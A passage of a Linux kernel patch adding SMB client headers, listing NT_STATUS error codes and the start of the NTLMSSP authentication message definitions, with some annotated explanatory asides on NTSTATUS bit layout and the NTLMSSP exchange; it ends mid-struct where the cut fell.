++#define NT_STATUS_INVALID_DOMAIN_STATE 0xC0000000 | 0x00dd
++#define NT_STATUS_INVALID_DOMAIN_ROLE 0xC0000000 | 0x00de
++#define NT_STATUS_NO_SUCH_DOMAIN 0xC0000000 | 0x00df
++#define NT_STATUS_DOMAIN_EXISTS 0xC0000000 | 0x00e0
++#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED 0xC0000000 | 0x00e1
++#define NT_STATUS_OPLOCK_NOT_GRANTED 0xC0000000 | 0x00e2
++#define NT_STATUS_INVALID_OPLOCK_PROTOCOL 0xC0000000 | 0x00e3
++#define NT_STATUS_INTERNAL_DB_CORRUPTION 0xC0000000 | 0x00e4
++#define NT_STATUS_INTERNAL_ERROR 0xC0000000 | 0x00e5
++#define NT_STATUS_GENERIC_NOT_MAPPED 0xC0000000 | 0x00e6
++#define NT_STATUS_BAD_DESCRIPTOR_FORMAT 0xC0000000 | 0x00e7
++#define NT_STATUS_INVALID_USER_BUFFER 0xC0000000 | 0x00e8
++#define NT_STATUS_UNEXPECTED_IO_ERROR 0xC0000000 | 0x00e9
++#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR 0xC0000000 | 0x00ea
++#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR 0xC0000000 | 0x00eb
++#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR 0xC0000000 | 0x00ec
++#define NT_STATUS_NOT_LOGON_PROCESS 0xC0000000 | 0x00ed
++#define NT_STATUS_LOGON_SESSION_EXISTS 0xC0000000 | 0x00ee
++#define NT_STATUS_INVALID_PARAMETER_1 0xC0000000 | 0x00ef
++#define NT_STATUS_INVALID_PARAMETER_2 0xC0000000 | 0x00f0
++#define NT_STATUS_INVALID_PARAMETER_3 0xC0000000 | 0x00f1
++#define NT_STATUS_INVALID_PARAMETER_4 0xC0000000 | 0x00f2
++#define NT_STATUS_INVALID_PARAMETER_5 0xC0000000 | 0x00f3
++#define NT_STATUS_INVALID_PARAMETER_6 0xC0000000 | 0x00f4
++#define NT_STATUS_INVALID_PARAMETER_7 0xC0000000 | 0x00f5
++#define NT_STATUS_INVALID_PARAMETER_8 0xC0000000 | 0x00f6
++#define NT_STATUS_INVALID_PARAMETER_9 0xC0000000 | 0x00f7
++#define NT_STATUS_INVALID_PARAMETER_10 0xC0000000 | 0x00f8
++#define NT_STATUS_INVALID_PARAMETER_11 0xC0000000 | 0x00f9
++#define NT_STATUS_INVALID_PARAMETER_12 0xC0000000 | 0x00fa
++#define NT_STATUS_REDIRECTOR_NOT_STARTED 0xC0000000 | 0x00fb
++#define NT_STATUS_REDIRECTOR_STARTED 0xC0000000 | 0x00fc
++#define NT_STATUS_STACK_OVERFLOW 0xC0000000 | 0x00fd
++#define NT_STATUS_NO_SUCH_PACKAGE 0xC0000000 | 0x00fe
++#define NT_STATUS_BAD_FUNCTION_TABLE 0xC0000000 | 0x00ff
++#define NT_STATUS_DIRECTORY_NOT_EMPTY 0xC0000000 | 0x0101
++#define NT_STATUS_FILE_CORRUPT_ERROR 0xC0000000 | 0x0102
++#define NT_STATUS_NOT_A_DIRECTORY 0xC0000000 | 0x0103
++#define NT_STATUS_BAD_LOGON_SESSION_STATE 0xC0000000 | 0x0104
++#define NT_STATUS_LOGON_SESSION_COLLISION 0xC0000000 | 0x0105
++#define NT_STATUS_NAME_TOO_LONG 0xC0000000 | 0x0106
++#define NT_STATUS_FILES_OPEN 0xC0000000 | 0x0107
++#define NT_STATUS_CONNECTION_IN_USE 0xC0000000 | 0x0108
++#define NT_STATUS_MESSAGE_NOT_FOUND 0xC0000000 | 0x0109
++#define NT_STATUS_PROCESS_IS_TERMINATING 0xC0000000 | 0x010a
++#define NT_STATUS_INVALID_LOGON_TYPE 0xC0000000 | 0x010b
++#define NT_STATUS_NO_GUID_TRANSLATION 0xC0000000 | 0x010c
++#define NT_STATUS_CANNOT_IMPERSONATE 0xC0000000 | 0x010d
++#define NT_STATUS_IMAGE_ALREADY_LOADED 0xC0000000 | 0x010e
++#define NT_STATUS_ABIOS_NOT_PRESENT 0xC0000000 | 0x010f
++#define NT_STATUS_ABIOS_LID_NOT_EXIST 0xC0000000 | 0x0110
++#define NT_STATUS_ABIOS_LID_ALREADY_OWNED 0xC0000000 | 0x0111
++#define NT_STATUS_ABIOS_NOT_LID_OWNER 0xC0000000 | 0x0112
++#define NT_STATUS_ABIOS_INVALID_COMMAND 0xC0000000 | 0x0113
++#define NT_STATUS_ABIOS_INVALID_LID 0xC0000000 | 0x0114
++#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE 0xC0000000 | 0x0115
++#define NT_STATUS_ABIOS_INVALID_SELECTOR 0xC0000000 | 0x0116
++#define NT_STATUS_NO_LDT 0xC0000000 | 0x0117
++#define NT_STATUS_INVALID_LDT_SIZE 0xC0000000 | 0x0118
++#define NT_STATUS_INVALID_LDT_OFFSET 0xC0000000 | 0x0119
++#define NT_STATUS_INVALID_LDT_DESCRIPTOR 0xC0000000 | 0x011a
++#define NT_STATUS_INVALID_IMAGE_NE_FORMAT 0xC0000000 | 0x011b
++#define NT_STATUS_RXACT_INVALID_STATE 0xC0000000 | 0x011c
++#define NT_STATUS_RXACT_COMMIT_FAILURE 0xC0000000 | 0x011d
++#define NT_STATUS_MAPPED_FILE_SIZE_ZERO 0xC0000000 | 0x011e
++#define NT_STATUS_TOO_MANY_OPENED_FILES 0xC0000000 | 0x011f
++#define NT_STATUS_CANCELLED 0xC0000000 | 0x0120
++#define NT_STATUS_CANNOT_DELETE 0xC0000000 | 0x0121
++#define NT_STATUS_INVALID_COMPUTER_NAME 0xC0000000 | 0x0122
++#define NT_STATUS_FILE_DELETED 0xC0000000 | 0x0123
++#define NT_STATUS_SPECIAL_ACCOUNT 0xC0000000 | 0x0124
++#define NT_STATUS_SPECIAL_GROUP 0xC0000000 | 0x0125
++#define NT_STATUS_SPECIAL_USER 0xC0000000 | 0x0126
++#define NT_STATUS_MEMBERS_PRIMARY_GROUP 0xC0000000 | 0x0127
++#define NT_STATUS_FILE_CLOSED 0xC0000000 | 0x0128
++#define NT_STATUS_TOO_MANY_THREADS 0xC0000000 | 0x0129
++#define NT_STATUS_THREAD_NOT_IN_PROCESS 0xC0000000 | 0x012a
++#define NT_STATUS_TOKEN_ALREADY_IN_USE 0xC0000000 | 0x012b
++#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED 0xC0000000 | 0x012c
++#define NT_STATUS_COMMITMENT_LIMIT 0xC0000000 | 0x012d
++#define NT_STATUS_INVALID_IMAGE_LE_FORMAT 0xC0000000 | 0x012e
++#define NT_STATUS_INVALID_IMAGE_NOT_MZ 0xC0000000 | 0x012f
++#define NT_STATUS_INVALID_IMAGE_PROTECT 0xC0000000 | 0x0130
++#define NT_STATUS_INVALID_IMAGE_WIN_16 0xC0000000 | 0x0131
++#define NT_STATUS_LOGON_SERVER_CONFLICT 0xC0000000 | 0x0132
++#define NT_STATUS_TIME_DIFFERENCE_AT_DC 0xC0000000 | 0x0133
++#define NT_STATUS_SYNCHRONIZATION_REQUIRED 0xC0000000 | 0x0134
++#define NT_STATUS_DLL_NOT_FOUND 0xC0000000 | 0x0135
++#define NT_STATUS_OPEN_FAILED 0xC0000000 | 0x0136
++#define NT_STATUS_IO_PRIVILEGE_FAILED 0xC0000000 | 0x0137
++#define NT_STATUS_ORDINAL_NOT_FOUND 0xC0000000 | 0x0138
++#define NT_STATUS_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0139
++#define NT_STATUS_CONTROL_C_EXIT 0xC0000000 | 0x013a
++#define NT_STATUS_LOCAL_DISCONNECT 0xC0000000 | 0x013b
++#define NT_STATUS_REMOTE_DISCONNECT 0xC0000000 | 0x013c
++#define NT_STATUS_REMOTE_RESOURCES 0xC0000000 | 0x013d
++#define NT_STATUS_LINK_FAILED 0xC0000000 | 0x013e
++#define NT_STATUS_LINK_TIMEOUT 0xC0000000 | 0x013f
++#define NT_STATUS_INVALID_CONNECTION 0xC0000000 | 0x0140
++#define NT_STATUS_INVALID_ADDRESS 0xC0000000 | 0x0141
++#define NT_STATUS_DLL_INIT_FAILED 0xC0000000 | 0x0142
++#define NT_STATUS_MISSING_SYSTEMFILE 0xC0000000 | 0x0143
++#define NT_STATUS_UNHANDLED_EXCEPTION 0xC0000000 | 0x0144
++#define NT_STATUS_APP_INIT_FAILURE 0xC0000000 | 0x0145
++#define NT_STATUS_PAGEFILE_CREATE_FAILED 0xC0000000 | 0x0146
++#define NT_STATUS_NO_PAGEFILE 0xC0000000 | 0x0147
++#define NT_STATUS_INVALID_LEVEL 0xC0000000 | 0x0148
++#define NT_STATUS_WRONG_PASSWORD_CORE 0xC0000000 | 0x0149
++#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT 0xC0000000 | 0x014a
++#define NT_STATUS_PIPE_BROKEN 0xC0000000 | 0x014b
++#define NT_STATUS_REGISTRY_CORRUPT 0xC0000000 | 0x014c
++#define NT_STATUS_REGISTRY_IO_FAILED 0xC0000000 | 0x014d
++#define NT_STATUS_NO_EVENT_PAIR 0xC0000000 | 0x014e
++#define NT_STATUS_UNRECOGNIZED_VOLUME 0xC0000000 | 0x014f
++#define NT_STATUS_SERIAL_NO_DEVICE_INITED 0xC0000000 | 0x0150
++#define NT_STATUS_NO_SUCH_ALIAS 0xC0000000 | 0x0151
++#define NT_STATUS_MEMBER_NOT_IN_ALIAS 0xC0000000 | 0x0152
++#define NT_STATUS_MEMBER_IN_ALIAS 0xC0000000 | 0x0153
++#define NT_STATUS_ALIAS_EXISTS 0xC0000000 | 0x0154
++#define NT_STATUS_LOGON_NOT_GRANTED 0xC0000000 | 0x0155
++#define NT_STATUS_TOO_MANY_SECRETS 0xC0000000 | 0x0156
++#define NT_STATUS_SECRET_TOO_LONG 0xC0000000 | 0x0157
++#define NT_STATUS_INTERNAL_DB_ERROR 0xC0000000 | 0x0158
++#define NT_STATUS_FULLSCREEN_MODE 0xC0000000 | 0x0159
++#define NT_STATUS_TOO_MANY_CONTEXT_IDS 0xC0000000 | 0x015a
++#define NT_STATUS_LOGON_TYPE_NOT_GRANTED 0xC0000000 | 0x015b
++#define NT_STATUS_NOT_REGISTRY_FILE 0xC0000000 | 0x015c
++#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x015d
++#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR 0xC0000000 | 0x015e
++#define NT_STATUS_FT_MISSING_MEMBER 0xC0000000 | 0x015f
++#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY 0xC0000000 | 0x0160
++#define NT_STATUS_ILLEGAL_CHARACTER 0xC0000000 | 0x0161
++#define NT_STATUS_UNMAPPABLE_CHARACTER 0xC0000000 | 0x0162
++#define NT_STATUS_UNDEFINED_CHARACTER 0xC0000000 | 0x0163
++#define NT_STATUS_FLOPPY_VOLUME 0xC0000000 | 0x0164
++#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND 0xC0000000 | 0x0165
++#define NT_STATUS_FLOPPY_WRONG_CYLINDER 0xC0000000 | 0x0166
++#define NT_STATUS_FLOPPY_UNKNOWN_ERROR 0xC0000000 | 0x0167
++#define NT_STATUS_FLOPPY_BAD_REGISTERS 0xC0000000 | 0x0168
++#define NT_STATUS_DISK_RECALIBRATE_FAILED 0xC0000000 | 0x0169
++#define NT_STATUS_DISK_OPERATION_FAILED 0xC0000000 | 0x016a
++#define NT_STATUS_DISK_RESET_FAILED 0xC0000000 | 0x016b
++#define NT_STATUS_SHARED_IRQ_BUSY 0xC0000000 | 0x016c
++#define NT_STATUS_FT_ORPHANING 0xC0000000 | 0x016d
++#define NT_STATUS_PARTITION_FAILURE 0xC0000000 | 0x0172
++#define NT_STATUS_INVALID_BLOCK_LENGTH 0xC0000000 | 0x0173
++#define NT_STATUS_DEVICE_NOT_PARTITIONED 0xC0000000 | 0x0174
++#define NT_STATUS_UNABLE_TO_LOCK_MEDIA 0xC0000000 | 0x0175
++#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA 0xC0000000 | 0x0176
++#define NT_STATUS_EOM_OVERFLOW 0xC0000000 | 0x0177
++#define NT_STATUS_NO_MEDIA 0xC0000000 | 0x0178
++#define NT_STATUS_NO_SUCH_MEMBER 0xC0000000 | 0x017a
++#define NT_STATUS_INVALID_MEMBER 0xC0000000 | 0x017b
++#define NT_STATUS_KEY_DELETED 0xC0000000 | 0x017c
++#define NT_STATUS_NO_LOG_SPACE 0xC0000000 | 0x017d
++#define NT_STATUS_TOO_MANY_SIDS 0xC0000000 | 0x017e
++#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED 0xC0000000 | 0x017f
++#define NT_STATUS_KEY_HAS_CHILDREN 0xC0000000 | 0x0180
++#define NT_STATUS_CHILD_MUST_BE_VOLATILE 0xC0000000 | 0x0181
++#define NT_STATUS_DEVICE_CONFIGURATION_ERROR 0xC0000000 | 0x0182
++#define NT_STATUS_DRIVER_INTERNAL_ERROR 0xC0000000 | 0x0183
++#define NT_STATUS_INVALID_DEVICE_STATE 0xC0000000 | 0x0184
++#define NT_STATUS_IO_DEVICE_ERROR 0xC0000000 | 0x0185
++#define NT_STATUS_DEVICE_PROTOCOL_ERROR 0xC0000000 | 0x0186
++#define NT_STATUS_BACKUP_CONTROLLER 0xC0000000 | 0x0187
++#define NT_STATUS_LOG_FILE_FULL 0xC0000000 | 0x0188
++#define NT_STATUS_TOO_LATE 0xC0000000 | 0x0189
++#define NT_STATUS_NO_TRUST_LSA_SECRET 0xC0000000 | 0x018a
++#define NT_STATUS_NO_TRUST_SAM_ACCOUNT 0xC0000000 | 0x018b
++#define NT_STATUS_TRUSTED_DOMAIN_FAILURE 0xC0000000 | 0x018c
++#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE 0xC0000000 | 0x018d
++#define NT_STATUS_EVENTLOG_FILE_CORRUPT 0xC0000000 | 0x018e
++#define NT_STATUS_EVENTLOG_CANT_START 0xC0000000 | 0x018f
++#define NT_STATUS_TRUST_FAILURE 0xC0000000 | 0x0190
++#define NT_STATUS_MUTANT_LIMIT_EXCEEDED 0xC0000000 | 0x0191
++#define NT_STATUS_NETLOGON_NOT_STARTED 0xC0000000 | 0x0192
++#define NT_STATUS_ACCOUNT_EXPIRED 0xC0000000 | 0x0193
++#define NT_STATUS_POSSIBLE_DEADLOCK 0xC0000000 | 0x0194
++#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT 0xC0000000 | 0x0195
++#define NT_STATUS_REMOTE_SESSION_LIMIT 0xC0000000 | 0x0196
++#define NT_STATUS_EVENTLOG_FILE_CHANGED 0xC0000000 | 0x0197
++#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT 0xC0000000 | 0x0198
++#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 0xC0000000 | 0x0199
++#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT 0xC0000000 | 0x019a
++#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT 0xC0000000 | 0x019b
++#define NT_STATUS_FS_DRIVER_REQUIRED 0xC0000000 | 0x019c
++#define NT_STATUS_NO_USER_SESSION_KEY 0xC0000000 | 0x0202
++#define NT_STATUS_USER_SESSION_DELETED 0xC0000000 | 0x0203
++#define NT_STATUS_RESOURCE_LANG_NOT_FOUND 0xC0000000 | 0x0204
++#define NT_STATUS_INSUFF_SERVER_RESOURCES 0xC0000000 | 0x0205
++#define NT_STATUS_INVALID_BUFFER_SIZE 0xC0000000 | 0x0206
++#define NT_STATUS_INVALID_ADDRESS_COMPONENT 0xC0000000 | 0x0207
++#define NT_STATUS_INVALID_ADDRESS_WILDCARD 0xC0000000 | 0x0208
++#define NT_STATUS_TOO_MANY_ADDRESSES 0xC0000000 | 0x0209
++#define NT_STATUS_ADDRESS_ALREADY_EXISTS 0xC0000000 | 0x020a
++#define NT_STATUS_ADDRESS_CLOSED 0xC0000000 | 0x020b
++#define NT_STATUS_CONNECTION_DISCONNECTED 0xC0000000 | 0x020c
++#define NT_STATUS_CONNECTION_RESET 0xC0000000 | 0x020d
++#define NT_STATUS_TOO_MANY_NODES 0xC0000000 | 0x020e
++#define NT_STATUS_TRANSACTION_ABORTED 0xC0000000 | 0x020f
++#define NT_STATUS_TRANSACTION_TIMED_OUT 0xC0000000 | 0x0210
++#define NT_STATUS_TRANSACTION_NO_RELEASE 0xC0000000 | 0x0211
++#define NT_STATUS_TRANSACTION_NO_MATCH 0xC0000000 | 0x0212
++#define NT_STATUS_TRANSACTION_RESPONDED 0xC0000000 | 0x0213
++#define NT_STATUS_TRANSACTION_INVALID_ID 0xC0000000 | 0x0214
++#define NT_STATUS_TRANSACTION_INVALID_TYPE 0xC0000000 | 0x0215
++#define NT_STATUS_NOT_SERVER_SESSION 0xC0000000 | 0x0216
++#define NT_STATUS_NOT_CLIENT_SESSION 0xC0000000 | 0x0217
++#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE 0xC0000000 | 0x0218
++#define NT_STATUS_DEBUG_ATTACH_FAILED 0xC0000000 | 0x0219
++#define NT_STATUS_SYSTEM_PROCESS_TERMINATED 0xC0000000 | 0x021a
++#define NT_STATUS_DATA_NOT_ACCEPTED 0xC0000000 | 0x021b
++#define NT_STATUS_NO_BROWSER_SERVERS_FOUND 0xC0000000 | 0x021c
++#define NT_STATUS_VDM_HARD_ERROR 0xC0000000 | 0x021d
++#define NT_STATUS_DRIVER_CANCEL_TIMEOUT 0xC0000000 | 0x021e
++#define NT_STATUS_REPLY_MESSAGE_MISMATCH 0xC0000000 | 0x021f
++#define NT_STATUS_MAPPED_ALIGNMENT 0xC0000000 | 0x0220
++#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH 0xC0000000 | 0x0221
++#define NT_STATUS_LOST_WRITEBEHIND_DATA 0xC0000000 | 0x0222
++#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID 0xC0000000 | 0x0223
++#define NT_STATUS_PASSWORD_MUST_CHANGE 0xC0000000 | 0x0224
++#define NT_STATUS_NOT_FOUND 0xC0000000 | 0x0225
++#define NT_STATUS_NOT_TINY_STREAM 0xC0000000 | 0x0226
++#define NT_STATUS_RECOVERY_FAILURE 0xC0000000 | 0x0227
++#define NT_STATUS_STACK_OVERFLOW_READ 0xC0000000 | 0x0228
++#define NT_STATUS_FAIL_CHECK 0xC0000000 | 0x0229
++#define NT_STATUS_DUPLICATE_OBJECTID 0xC0000000 | 0x022a
++#define NT_STATUS_OBJECTID_EXISTS 0xC0000000 | 0x022b
++#define NT_STATUS_CONVERT_TO_LARGE 0xC0000000 | 0x022c
++#define NT_STATUS_RETRY 0xC0000000 | 0x022d
++#define NT_STATUS_FOUND_OUT_OF_SCOPE 0xC0000000 | 0x022e
++#define NT_STATUS_ALLOCATE_BUCKET 0xC0000000 | 0x022f
++#define NT_STATUS_PROPSET_NOT_FOUND 0xC0000000 | 0x0230
++#define NT_STATUS_MARSHALL_OVERFLOW 0xC0000000 | 0x0231
++#define NT_STATUS_INVALID_VARIANT 0xC0000000 | 0x0232
++#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND 0xC0000000 | 0x0233
++#define NT_STATUS_ACCOUNT_LOCKED_OUT 0xC0000000 | 0x0234
++#define NT_STATUS_HANDLE_NOT_CLOSABLE 0xC0000000 | 0x0235
++#define NT_STATUS_CONNECTION_REFUSED 0xC0000000 | 0x0236
++#define NT_STATUS_GRACEFUL_DISCONNECT 0xC0000000 | 0x0237
++#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED 0xC0000000 | 0x0238
++#define NT_STATUS_ADDRESS_NOT_ASSOCIATED 0xC0000000 | 0x0239
++#define NT_STATUS_CONNECTION_INVALID 0xC0000000 | 0x023a
++#define NT_STATUS_CONNECTION_ACTIVE 0xC0000000 | 0x023b
++#define NT_STATUS_NETWORK_UNREACHABLE 0xC0000000 | 0x023c
++#define NT_STATUS_HOST_UNREACHABLE 0xC0000000 | 0x023d
++#define NT_STATUS_PROTOCOL_UNREACHABLE 0xC0000000 | 0x023e
++#define NT_STATUS_PORT_UNREACHABLE 0xC0000000 | 0x023f
++#define NT_STATUS_REQUEST_ABORTED 0xC0000000 | 0x0240
++#define NT_STATUS_CONNECTION_ABORTED 0xC0000000 | 0x0241
++#define NT_STATUS_BAD_COMPRESSION_BUFFER 0xC0000000 | 0x0242
++#define NT_STATUS_USER_MAPPED_FILE 0xC0000000 | 0x0243
++#define NT_STATUS_AUDIT_FAILED 0xC0000000 | 0x0244
++#define NT_STATUS_TIMER_RESOLUTION_NOT_SET 0xC0000000 | 0x0245
++#define NT_STATUS_CONNECTION_COUNT_LIMIT 0xC0000000 | 0x0246
++#define NT_STATUS_LOGIN_TIME_RESTRICTION 0xC0000000 | 0x0247
++#define NT_STATUS_LOGIN_WKSTA_RESTRICTION 0xC0000000 | 0x0248
++#define NT_STATUS_IMAGE_MP_UP_MISMATCH 0xC0000000 | 0x0249
++#define NT_STATUS_INSUFFICIENT_LOGON_INFO 0xC0000000 | 0x0250
++#define NT_STATUS_BAD_DLL_ENTRYPOINT 0xC0000000 | 0x0251
++#define NT_STATUS_BAD_SERVICE_ENTRYPOINT 0xC0000000 | 0x0252
++#define NT_STATUS_LPC_REPLY_LOST 0xC0000000 | 0x0253
++#define NT_STATUS_IP_ADDRESS_CONFLICT1 0xC0000000 | 0x0254
++#define NT_STATUS_IP_ADDRESS_CONFLICT2 0xC0000000 | 0x0255
++#define NT_STATUS_REGISTRY_QUOTA_LIMIT 0xC0000000 | 0x0256
++#define NT_STATUS_PATH_NOT_COVERED 0xC0000000 | 0x0257
++#define NT_STATUS_NO_CALLBACK_ACTIVE 0xC0000000 | 0x0258
++#define NT_STATUS_LICENSE_QUOTA_EXCEEDED 0xC0000000 | 0x0259
++#define NT_STATUS_PWD_TOO_SHORT 0xC0000000 | 0x025a
++#define NT_STATUS_PWD_TOO_RECENT 0xC0000000 | 0x025b
++#define NT_STATUS_PWD_HISTORY_CONFLICT 0xC0000000 | 0x025c
++#define NT_STATUS_PLUGPLAY_NO_DEVICE 0xC0000000 | 0x025e
++#define NT_STATUS_UNSUPPORTED_COMPRESSION 0xC0000000 | 0x025f
++#define NT_STATUS_INVALID_HW_PROFILE 0xC0000000 | 0x0260
++#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH 0xC0000000 | 0x0261
++#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND 0xC0000000 | 0x0262
++#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND 0xC0000000 | 0x0263
++#define NT_STATUS_RESOURCE_NOT_OWNED 0xC0000000 | 0x0264
++#define NT_STATUS_TOO_MANY_LINKS 0xC0000000 | 0x0265
++#define NT_STATUS_QUOTA_LIST_INCONSISTENT 0xC0000000 | 0x0266
++#define NT_STATUS_FILE_IS_OFFLINE 0xC0000000 | 0x0267
++#define NT_STATUS_NO_SUCH_JOB 0xC0000000 | 0xEDE	/* scheduler */
++
++#endif				/* _NTERR_H */
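
A quick aside on these constants: they follow the NTSTATUS layout from
MS-ERREF, where the top two bits carry the severity (0xC0000000 sets
severity 3, an error) and the low 16 bits carry the code. Note also that
the defines above expand to an unparenthesized "a | b", so they are only
safe where no tighter-binding operator sits next to the expansion. A
minimal standalone sketch of both points, using a parenthesized copy of
NT_STATUS_DISK_FULL (the macro and helper names here are illustrative,
not part of the patch):

#include <stdio.h>
#include <stdint.h>

/* Parenthesized copy of NT_STATUS_DISK_FULL (0xC0000000 | 0x007f). */
#define NT_STATUS_DISK_FULL_SKETCH (0xC0000000 | 0x007f)

/* Illustrative helper: top two bits == 11 means error severity. */
static int nt_status_is_error(uint32_t status)
{
	return (status >> 30) == 0x3;
}

int main(void)
{
	uint32_t status = NT_STATUS_DISK_FULL_SKETCH;

	/*
	 * The parentheses matter: with the unparenthesized form,
	 * status == 0xC0000000 | 0x007f parses as
	 * (status == 0xC0000000) | 0x007f, because == binds more
	 * tightly than |.
	 */
	printf("error=%d code=0x%04x\n", nt_status_is_error(status),
	       (unsigned int)(status & 0xffff));
	return 0;
}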
+diff --git a/fs/smb/client/ntlmssp.h b/fs/smb/client/ntlmssp.h
+new file mode 100644
+index 0000000000000..55758b9ec877e
+--- /dev/null
++++ b/fs/smb/client/ntlmssp.h
+@@ -0,0 +1,157 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#define NTLMSSP_SIGNATURE "NTLMSSP"
++/* Message Types */
++#define NtLmNegotiate     cpu_to_le32(1)
++#define NtLmChallenge     cpu_to_le32(2)
++#define NtLmAuthenticate  cpu_to_le32(3)
++#define UnknownMessage    cpu_to_le32(8)
++
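++/*
++ * Illustrative aside (not part of the original header): these types are
++ * the three legs of the NTLMSSP exchange from MS-NLMP:
++ *
++ *   client -> server  NEGOTIATE_MESSAGE    (NtLmNegotiate,    type 1)
++ *   server -> client  CHALLENGE_MESSAGE    (NtLmChallenge,    type 2)
++ *   client -> server  AUTHENTICATE_MESSAGE (NtLmAuthenticate, type 3)
++ *
++ * cifs.ko carries these blobs inside SMB session setup requests; the
++ * structures for each leg are defined later in this header.
++ */
++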
++/* Negotiate Flags */
++#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
++#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
++#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
++/* define reserved9                       0x08 */
++#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
++#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
++#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
++#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
++/* defined reserved 8                   0x0100 */
++#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
++#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
++#define NTLMSSP_ANONYMOUS               0x0800
++#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
++#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
++#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
++#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
++#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
++#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
++#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
++#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB: not related to NTLMv2 pwd */
++/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
++#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
++#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
++#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
++#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
++/* #define reserved4                 0x1000000 */
++#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we only set for SMB2+ */
++/* #define reserved3                 0x4000000 */
++/* #define reserved2                 0x8000000 */
++/* #define reserved1                0x10000000 */
++#define NTLMSSP_NEGOTIATE_128       0x20000000
++#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
++#define NTLMSSP_NEGOTIATE_56        0x80000000
++
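++/*
++ * Illustrative example (not part of the original header): a modern
++ * NTLMv2-capable client typically ORs together something like
++ *
++ *   NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET |
++ *   NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_ALWAYS_SIGN |
++ *   NTLMSSP_NEGOTIATE_EXTENDED_SEC | NTLMSSP_NEGOTIATE_TARGET_INFO |
++ *   NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_56
++ *
++ * adding NTLMSSP_NEGOTIATE_SIGN/_SEAL and _KEY_XCH when signing or
++ * sealing is wanted; the exact mask is negotiated per session.
++ */
++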
++/* Define AV Pair Field IDs */
++enum av_field_type {
++	NTLMSSP_AV_EOL = 0,
++	NTLMSSP_AV_NB_COMPUTER_NAME,
++	NTLMSSP_AV_NB_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_COMPUTER_NAME,
++	NTLMSSP_AV_DNS_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_TREE_NAME,
++	NTLMSSP_AV_FLAGS,
++	NTLMSSP_AV_TIMESTAMP,
++	NTLMSSP_AV_RESTRICTION,
++	NTLMSSP_AV_TARGET_NAME,
++	NTLMSSP_AV_CHANNEL_BINDINGS
++};
++
++/*
++ * Although typedefs are not commonly used for structure definitions
++ * in the Linux kernel, in this particular case they are useful
++ * to more closely match the standards document for NTLMSSP from
++ * OpenGroup and to make the code more closely match the standard in
++ * appearance.
++ */
++
++typedef struct _SECURITY_BUFFER {
++	__le16 Length;
++	__le16 MaximumLength;
++	__le32 BufferOffset;	/* offset to buffer */
++} __attribute__((packed)) SECURITY_BUFFER;
++
++typedef struct _NEGOTIATE_MESSAGE {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
++	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
++	/* SECURITY_BUFFER for version info not present since we
++	   do not set the version-is-present flag */
